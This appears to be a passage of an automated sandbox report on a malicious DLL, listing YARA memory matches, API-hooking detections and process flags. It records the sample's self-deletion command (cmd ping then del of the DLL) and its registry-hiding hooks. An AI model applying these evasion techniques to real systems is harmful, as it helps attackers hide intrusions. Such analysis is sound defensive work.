Source: Yara match File source: 00000003.00000003.545905967.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.637594207.000000000544C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6424, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3352, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match File source: 0.2.loaddll32.exe.b00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.4a794a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.96a309.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.13494a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.4a794a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.6aa309.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.13494a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.50394a0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.50394a0.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.3020000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.2f7a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.2f7a309.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.96a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.69a309.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.69a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.6aa309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.6e1a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.300a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.2bd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.300a309.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.821862720.0000000001349000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.488168081.0000000002F70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.750652443.0000000005039000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.524931430.0000000004A79000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.457623668.0000000003000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.456819132.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.491371934.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Self deletion via cmd delete
Source: C:\Windows\explorer.exe Process created: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
Source: C:\Windows\explorer.exe Process created: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
Source: C:\Windows\explorer.exe Process created: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
Source: C:\Windows\explorer.exe Process created: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFC8BAF521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFC8BAF5200
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
